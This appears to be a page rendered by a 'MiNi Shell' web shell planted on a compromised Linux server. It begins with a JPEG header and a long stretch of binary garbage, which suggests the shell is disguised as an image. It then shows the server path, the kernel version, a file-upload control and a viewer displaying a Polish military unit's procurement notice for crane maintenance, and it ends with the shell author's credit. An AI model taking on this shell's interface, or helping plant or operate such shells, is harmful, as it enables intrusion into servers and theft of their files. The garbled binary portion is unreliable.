JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/frontend/runtime/temp/20170131/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/frontend/runtime/temp/20170131/17426_2017.xml

<?xml version="1.0" encoding="utf-8"?><ZP-400><biuletyn>2017</biuletyn><pozycja>17426</pozycja><data_publikacji>2017-01-31</data_publikacji><nazwa>17 Wojskowy Oddział Gospodarczy</nazwa><ulica>4 Marca</ulica><nr_domu>3</nr_domu><nr_miesz></nr_miesz><miejscowosc>Koszalin</miejscowosc><kod_poczt>75-901 </kod_poczt><panstwo>Polska</panstwo><wojewodztwo>zachodniopomorskie</wojewodztwo><tel>261 45 68 15, 
261 45 61 95</tel><fax>261 45 62 44</fax><email>17wog.przetargi@ron.mil.pl, 
17wog.przetargi@ron.mil.pl</email><internet></internet><adres_strony_internetowej_narzedzia></adres_strony_internetowej_narzedzia><adres_strony_url>www.17wog.wp.mil.pl </adres_strony_url><podmiot2c></podmiot2c><regon>33120312800000</regon><e_mail></e_mail><ogloszenie>Ogłoszenie o zamówieniu</ogloszenie><czy_obowiazkowa>T</czy_obowiazkowa><zamieszczanie_obowiazkowe>T</zamieszczanie_obowiazkowe><nazwa_projektu_programu></nazwa_projektu_programu><czy_ubiegac_zaklady_pracy /><minimalny_procent_zatrudnienia></minimalny_procent_zatrudnienia><czy_przeprowadza_centralny_zamawiajacy /><czy_przeprowadza_podmiot_zamawiajacy_powierzyl /><zamawiajacy_powierzyl></zamawiajacy_powierzyl><czy_przeprowadza_wapolnie /><przeprowadza_wapolnie_podmiot1></przeprowadza_wapolnie_podmiot1><przeprowadza_wapolnie_podmiot2></przeprowadza_wapolnie_podmiot2><czy_przeprowadza_zamawiajacy_z_eu /><postepowanie_wspolne_tresc></postepowanie_wspolne_tresc><informacje_dodatkowe_zamawiajacy></informacje_dodatkowe_zamawiajacy><dotyczy>1</dotyczy><adres_dyn_zak></adres_dyn_zak><rodzaj_zam>podmiot prawa publicznego</rodzaj_zam><wspolne_udzielanie_zamowienia></wspolne_udzielanie_zamowienia><czy_dostep_dokumentow_zamowienia>T</czy_dostep_dokumentow_zamowienia><dostep_dokumentow_zamowienia>www.17wog.wp.mil.pl </dostep_dokumentow_zamowienia><czy_zamieszczona_bedzie_specyfikacja>T</czy_zamieszczona_bedzie_specyfikacja><zamieszczona_bedzie_specyfikacja>www.17wog.wp.mil.pl </zamieszczona_bedzie_specyfikacja><czy_dostep_do_dokumentow_ograniczony /><czy_wymagane_przeslanie_ofert>T</czy_wymagane_przeslanie_ofert><wymagane_przeslanie_ofert_inny>Za pośrednictwem operatora pocztowego w rozumieniu ustawy z dn. 23 listopada 2012 r. Prawo pocztowe (Dz.U. poz. 529 orz 2015 r. poz. 1830) za pośrednictwem posłańca lub osobiście</wymagane_przeslanie_ofert_inny><czy_podzielone_na_czesci>N</czy_podzielone_na_czesci><oferty_lub_wnioski /><maksymalna_liczba_czesci></maksymalna_liczba_czesci><zastrezega_prawo_grup_czesci></zastrezega_prawo_grup_czesci><maksymalna_liczba_czesci_jednemu_wykonawcy></maksymalna_liczba_czesci_jednemu_wykonawcy><dostep_do_dokumentow_ograniczony></dostep_do_dokumentow_ograniczony><czy_oferty_wnioski_dostepne /><oferty_wnioski_dostepne></oferty_wnioski_dostepne><czy_dopuszczone_wymagane_przeslanie_ofert /><dopuszczone_wymagane_przeslanie_ofert_inny></dopuszczone_wymagane_przeslanie_ofert_inny><dopuszczone_wymagane_przeslanie_ofert_adres>17 Wojskowy Oddział Gospodarczy w Koszalinie, ul. 4 Marca 3, 75-901 Koszalin</dopuszczone_wymagane_przeslanie_ofert_adres><czy_komunikacja_elektroniczna_wymaga /><komunikacja_elektroniczna_wymaga></komunikacja_elektroniczna_wymaga><wymagania_dotyczace_rejestracji_wyk_aukcja></wymagania_dotyczace_rejestracji_wyk_aukcja><nazwa_zamowienia>Usługi konserwacji i naprawy żurawi, dźwigów i podnośników eksploatowanych w rejonie odpowiedzialności 17 Wojskowego Oddziału Gospodarczego w Koszalinie</nazwa_zamowienia><numer_referencyjny>7/WOG/U/Uzbr./17</numer_referencyjny><czy_dialog_techniczny /><rodz_zam>U</rodz_zam><przedmiot_zam>Przedmiotem zamówienia są usługi konserwacji i naprawy żurawi, dźwigów i podnośników eksploatowanych w rejonie odpowiedzialności 17 Wojskowego Oddziału Gospodarczego w Koszalinie, zgodnie ze Specyfikacją Techniczną Wykonania i Odbioru Usługi stanowiącą załącznik nr 1 do SIWZ. </przedmiot_zam><cpv1c>50531400-0</cpv1c><cpv2c>50531500-1</cpv2c><okres2c>24</okres2c><szacunkowa_wart_zam_calosc></szacunkowa_wart_zam_calosc><waluta_calosc></waluta_calosc><czy_przewiduje_udzielenie_zamowien_67>N</czy_przewiduje_udzielenie_zamowien_67><czy_przewiduje_udzielenie_zamowien_67_tekst></czy_przewiduje_udzielenie_zamowien_67_tekst><czy_czesci /><czy_czesci_wymaga /><ilosc_czesci></ilosc_czesci><ilosc_czesci_max></ilosc_czesci_max><czy_wariant /><czy_uzup /><zam_uzupelniajace></zam_uzupelniajace><czas>
        O
      </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_zak></data_zak><ii_2_lub_temp></ii_2_lub_temp><informacje_na_temat_katalogow></informacje_na_temat_katalogow><okreslenie_warunkow>Zamawiający nie określa warunków w ww. zakresie.</okreslenie_warunkow><informacje_dodatkowe_okreslenie_warunkow></informacje_dodatkowe_okreslenie_warunkow><sytuacja_finansowa_okreslenie_warunkow>Zamawiający nie określa warunków w ww. zakresie.</sytuacja_finansowa_okreslenie_warunkow><sytuacja_finansowa_informacje_dodatkowe></sytuacja_finansowa_informacje_dodatkowe><zdolnosc_techniczna_okreslenie_warunkow>Wykonawca spełni warunek jeżeli wykaże, że dysponuje osobami do realizacji niniejszego zamówienia: 
- co najmniej jedną osobą, posiadającą uprawnienia wydane przez Wojskowy Dozór Techniczny lub Urząd Dozoru Technicznego uprawniających do konserwacji urządzeń transportu bliskiego (podnośników, żurawi samojezdnych, dźwigników);
- co najmniej jedną osobą, posiadającą uprawnienia wydane przez Wojskowy Dozór Techniczny uprawniające do konserwacji żurawi specjalistycznych 4901, 4033B, D-35;
- co najmniej jedną osobą, posiadającą aktualne uprawnienia do zajmowania się eksploatacją urządzeń i instalacji elektroenergetycznych do 1kV w zakresie konserwacji, napraw montażu zgodnie z Rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. z 2003 r. nr 89 poz. 828 z późn. zm.);
</zdolnosc_techniczna_okreslenie_warunkow><zdolnosc_techniczna_informacje_dodatkowe></zdolnosc_techniczna_informacje_dodatkowe><czy_zdolnosc_techniczna_wymaga_wykonawcow>T</czy_zdolnosc_techniczna_wymaga_wykonawcow><czy_zamawiajacy_przewiduje_wykluczenie>T</czy_zamawiajacy_przewiduje_wykluczenie><art_24_ust_5_pkt_1>T</art_24_ust_5_pkt_1><art_24_ust_5_pkt_2 /><art_24_ust_5_pkt_3 /><art_24_ust_5_pkt_4 /><art_24_ust_5_pkt_5 /><art_24_ust_5_pkt_6 /><art_24_ust_5_pkt_7 /><art_24_ust_5_pkt_8 /><czy_oswiadczenie_niepodleganiu_wykluczenia>T</czy_oswiadczenie_niepodleganiu_wykluczenia><czy_oswiadczenie_spelnienie_kryteriow /><zaliczka /><uprawnienie></uprawnienie><wiedza></wiedza><potencjal></potencjal><zdolne></zdolne><sytuacja></sytuacja><sprawozdanie_calosc></sprawozdanie_calosc><lata_obrotowe></lata_obrotowe><oswiadczenie_potwierdzenia_1 /><oswiadczenie_potwierdzenia_2 /><oswiadczenie_potwierdzenia_3 /><oswiadczenie_potwierdzenia_4 /><oswiadczenie_potwierdzenia_5 /><oswiadczenie_potwierdzenia_6 /><oswiadczenie_potwierdzenia_7 /><oswiadczenie_potwierdzenia_8 /><oswiadczenie_potwierdzenia_9 /><oswiadczenie_potwierdzenia_10 /><oswiadczenie_wykluczenia_1 /><oswiadczenie_wykluczenia_2 /><oswiadczenie_wykluczenia_3 /><oswiadczenie_wykluczenia_4 /><oswiadczenie_wykluczenia_5 /><oswiadczenie_wykluczenia_6 /><oswiadczenie_wykluczenia_7 /><dok_podm_zag_1 /><dok_podm_zag_2 /><dok_podm_zag_3 /><dok_podm_zag_4 /><dok_potw_1 /><dok_potw_2 /><dok_potw_3 /><dok_potw_4 /><dok_potw_5 /><dok_potw_6 /><inne_dok_potw></inne_dok_potw><inne_dokumenty></inne_dokumenty><niepelnosprawne /><oswiadczenie_przedlozyc /><inne_dokumenty></inne_dokumenty><wykaz_dokumentow_zaswiadczen>(1)	Odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw do wykluczenia na podstawie 24 ust. 5 pkt 1. </wykaz_dokumentow_zaswiadczen><zakresie_warunkow_udzialu>(1)	Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, zgodnie z wzorem stanowiącym załącznik nr 4 do SIWZ.</zakresie_warunkow_udzialu><zakresie_kryteriow_selekcji></zakresie_kryteriow_selekcji><inne_dokumenty_niewymienione>1)wypełniony formularz oferty - sporządzony według wzoru stanowiącego załącznik nr 2 do SIWZ, 
2)w przypadku, gdy ofertę w imieniu Wykonawcy podpisuje(ą) osoba (y) inna (e) niż upoważniona(e) do reprezentowania Wykonawcy, do oferty należy załączyć dokument lub dokumenty, z którego(ych) będzie wynikać zakres umocowania.  
3)w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego, 

</inne_dokumenty_niewymienione><wykaz_potwierdzenie_okolicznosci></wykaz_potwierdzenie_okolicznosci><wadium></wadium><czy_wadium>N</czy_wadium><przewiduje_udzielenie_zaliczek></przewiduje_udzielenie_zaliczek><czy_przewiduje_udzielenie_zaliczek>N</czy_przewiduje_udzielenie_zaliczek><zlozenie_katalogow_elektronicznych_informacje_dodatkowe></zlozenie_katalogow_elektronicznych_informacje_dodatkowe><czy_dopuszcza_zlozenie_katalogow_elektronicznych>N</czy_dopuszcza_zlozenie_katalogow_elektronicznych><czy_wymaga_zlozenie_katalogow_elektronicznych>N</czy_wymaga_zlozenie_katalogow_elektronicznych><czy_wymaga_zlozenie_oferty_wariantowej>N</czy_wymaga_zlozenie_oferty_wariantowej><czy_dopuszcza_zlozenie_oferty_wariantowej>N</czy_dopuszcza_zlozenie_oferty_wariantowej><czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej /><liczba_wyk></liczba_wyk><minimalna_liczba_wykonawcow></minimalna_liczba_wykonawcow><maksymalna_liczba_wykonawcow></maksymalna_liczba_wykonawcow><wybor_wyk></wybor_wyk><kod_trybu>PN</kod_trybu><z_kim_umowa_bedzie_zawarta /><czy_ograniczenie_liczby_uczestnikow /><ograniczenie_liczby_uczestnikow></ograniczenie_liczby_uczestnikow><ograniczenie_liczby_uczestnikow_informacje_dodatkowe></ograniczenie_liczby_uczestnikow_informacje_dodatkowe><czy_obejmuje_ustanowienie /><obejmuje_ustanowienie></obejmuje_ustanowienie><obejmuje_ustanowienie_informacje_dodatkowe></obejmuje_ustanowienie_informacje_dodatkowe><czy_pobranie_umowy_ramowej_dynamicznego_katalogow /><czy_umowy_ramowej_dynamicznego_katalogow /><czy_zmiana_umowy>T</czy_zmiana_umowy><zmiana_umowy>1.	Zamawiający dopuszcza istotne zmiany postanowień zawartej umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie zmiany wynagrodzenia w wypadku wystąpienia jednej ze zmian przepisów wskazanych w art. 142 ust. 5 ustawy z dnia 29 stycznia 2004 rok – Prawo zamówień publicznych, tj. zmiany:
a)	stawki podatku od towarów i usług,
b)	wysokości minimalnego wynagrodzenia za pracę albo minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002r. o minimalnym wynagrodzeniu za pracę,
c)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne.
Zmiana wysokości wynagrodzenia obowiązywać będzie od dnia wejścia w życie zmian o których mowa w pkt. 1 .
W wypadku zmiany, o której mowa w pkt. 1  pkt. a) wartość netto wynagrodzenia Wykonawcy nie zmieni się, a określona w aneksie wartość brutto wynagrodzenia zostanie wyliczona na podstawie nowych przepisów.
W przypadku zmiany, o której mowa pkt. 1  pkt. b ) wynagrodzenie Wykonawcy ulegnie zmianie o wartość wzrostu całkowitego kosztu Wykonawcy wynikającego adekwatnie ze zwiększenia wynagrodzeń osób bezpośrednio wykonujących zamówienie do wysokości aktualnie obowiązującego minimalnego wynagrodzenia, z uwzględnieniem wszystkich obciążeń publicznoprawnych od kwoty wzrostu minimalnego wynagrodzenia.
W przypadku zmiany, o którym mowa w pkt. 1  pkt. c ) wynagrodzenie Wykonawcy ulegnie adekwatnie zmianie o wartość wzrostu całkowitego kosztu Wykonawcy, jaką będzie on zobowiązany dodatkowo ponieść w celu uwzględnienia tej zmiany, przy zachowaniu dotychczasowej kwoty netto wynagrodzenia osób bezpośrednio wykonujących zamówienie na rzecz Zamawiającego.
Za wyjątkiem sytuacji o której mowa w ust. pkt. 1  pkt. a ) wprowadzenie zmian wysokości wynagrodzenia wymaga złożenia przez Wykonawcę wniosków wskazanych z ust. poniżej oraz udokumentowanego oświadczenia o wysokości dodatkowych kosztów wynikających z wprowadzenia zmian. 
W sytuacji wystąpienia okoliczności wskazanych w pkt. 1  pkt. b ) Wykonawca składa pisemny wniosek o zmianę umowy o zamówienie publiczne w zakresie płatności wynikających z faktur po wejściu w życie przepisów zmieniających wysokość minimalnego wynagrodzenia za pracę. Wniosek powinien zawierać wyczerpujące uzasadnienie faktyczne i prawne oraz dokładne wyliczenie kwoty wynagrodzenia Wykonawcy po zmianie umowy, w szczególności Wykonawca będzie zobowiązany wykazać związek pomiędzy wnioskowaną kwotą podwyższenia wynagrodzenia umownego a wpływem zmiany minimalnego wynagrodzenia za pracę na kalkulację ceny ofertowej. Wniosek powinien obejmować jedynie te dodatkowe koszty realizacji zamówienia, które wykonawca obowiązkowo ponosi w związku z podwyższeniem wysokości płacy minimalnej. Nie będą akceptowane koszty wynikające z podwyższenia wynagrodzeń pracownikom Wykonawcy, które nie są konieczne w celu ich dostosowania do wysokości minimalnego wynagrodzenia za pracę.
W sytuacji wystąpienia okoliczności wskazanych w pkt. 1  pkt. c)  Wykonawca składa pisemny wniosek o zmianę umowy o zamówienie publiczne w zakresie płatności wynikających z faktur wystawionych po zmianie zasad podlegania ubezpieczeniu społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki na ubezpieczenie społeczne lub zdrowotne. Wniosek powinien zawierać wyczerpujące uzasadnieni faktyczne i prawne oraz dokładne wyliczenie kwoty wynagrodzenia Wykonawcy po zmianie umowy, szczególności Wykonawca będzie zobowiązany wykazać związek pomiędzy wnioskowaną kwotą podwyższenia wynagrodzenia umownego a wpływem zmiany zasad, o których mowa w ust. 1, ceny ofertowej. Wniosek  powinien obejmować jedynie te dodatkowe koszty realizacji zamówienia.
Zamawiający po zaakceptowaniu wniosków, o których mowa powyżej  wyznacza datę podpisania aneksu do umowy.
Obowiązek wykazania wpływu zmian, o których mowa powyżej na koszty wykonania zamówienia należy od Wykonawcy pod rygorem odmowy dokonania zmiany umowy przez Zamawiającego.
2.	Każda zmiana umowy musi być dokonana na piśmie w formie aneksu pod rygorem nieważności oraz wymaga zgody drugiej strony.
</zmiana_umowy><kryt_cena></kryt_cena><kryt_0>cena za konserwację</kryt_0><kryt_0p>30</kryt_0p><czy_aukcja /><aukcja_dod_info></aukcja_dod_info><elementy_aukcji_elektronicznej></elementy_aukcji_elektronicznej><ograniczenia_do_przedstawianych_wartosci></ograniczenia_do_przedstawianych_wartosci><informaje_udostepnione_wykonawcom></informaje_udostepnione_wykonawcom><informaje_przebiegu_aukcji></informaje_przebiegu_aukcji><warunki_do_licytacji></warunki_do_licytacji><wykorzystanie_sprzetu_elektronicznego></wykorzystanie_sprzetu_elektronicznego><spec_www></spec_www><spec_war></spec_war><potrzeb></potrzeb><wys_nagrod></wys_nagrod><harm_diag_kon></harm_diag_kon><pod_kon_etapy></pod_kon_etapy><data_skl>09/02/2017</data_skl><godz_skl>10:00</godz_skl><miejsce></miejsce><IV_4_4_jezyki></IV_4_4_jezyki><termin>
        on
      </termin><okres_liczba_dni>30</okres_liczba_dni><okres_data_do></okres_data_do><le_adres_aukcja></le_adres_aukcja><le_adres_opis></le_adres_opis><le_wymagania></le_wymagania><le_postapien></le_postapien><licytacja_etapy></licytacja_etapy><czas_trwania></czas_trwania><etap_1></etap_1><etap_1_c></etap_1_c><le_czy_nast /><licytacja_etapya></licytacja_etapya><czas_trwania></czas_trwania><etap_1></etap_1><etap_1_c></etap_1_c><le_czy_nasta /><warunki_zamkniecia_aukcji></warunki_zamkniecia_aukcji><zastosowanie_procedury_pzp>T</zastosowanie_procedury_pzp><IV_3_1_minimalne_wymagania></IV_3_1_minimalne_wymagania><IV_3_1_Przewidziane_jest_zastrzezenie /><IV_3_1_Przewidziany_podzial /><IV_3_1_etapy_negocjacji></IV_3_1_etapy_negocjacji><IV_3_1_dodatkowe_informacje></IV_3_1_dodatkowe_informacje><IV_3_2_opis_potrzeb></IV_3_2_opis_potrzeb><IV_3_2_informacja_wysokosc_nagrod></IV_3_2_informacja_wysokosc_nagrod><IV_3_2_wstepny_harmonogram></IV_3_2_wstepny_harmonogram><IV_3_2_PodzialDialogu /><IV_3_2_EtapyDialogu></IV_3_2_EtapyDialogu><IV_3_2_DodatkoweInformacje></IV_3_2_DodatkoweInformacje><IV_3_3_ElementyOpisu></IV_3_3_ElementyOpisu><IV_3_3_PodzialNegocjacji /><IV_3_3_DodatkoweInfo></IV_3_3_DodatkoweInfo><IV_IstotnePostanowienia></IV_IstotnePostanowienia><IV_LicytacjeDodatkoweInformacje></IV_LicytacjeDodatkoweInformacje><IV_6_1_sposob_udostepniania></IV_6_1_sposob_udostepniania><IV_6_1_srodki_ochrony></IV_6_1_srodki_ochrony><IV_6_2_SkrocenieTerminu>N</IV_6_2_SkrocenieTerminu><IV_6_2_Powody></IV_6_2_Powody><IV_6_6></IV_6_6><IV_6_5>N</IV_6_5><le_data_skl /><le_godz_skl /><le_miejsce_skl /><le_term_otw /><le_term_war_zam></le_term_war_zam><wym_zab_umowy></wym_zab_umowy><istotne_post></istotne_post><inf_dodat /><czy_uniewaznienie>T</czy_uniewaznienie><informacje_o_ustanowieniu_dds></informacje_o_ustanowieniu_dds><adres_poczty_internetowej_dds></adres_poczty_internetowej_dds><informacje_dotyczace_partnerstwa_innowacyjnego></informacje_dotyczace_partnerstwa_innowacyjnego><czesci><cz_0><nr_czesci></nr_czesci><nazwa></nazwa><opis></opis><informacje_dodatkowe></informacje_dodatkowe><szacunkowa_wartosc_zamowienia_zal></szacunkowa_wartosc_zamowienia_zal><waluta_zal></waluta_zal><cpv1c></cpv1c><czas>
              O
            </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_kon></data_kon><kryt_cena></kryt_cena><kryt_1></kryt_1><kryt_1p></kryt_1p></cz_0></czesci></ZP-400>

Creat By MiNi SheLL
Email: jattceo@gmail.com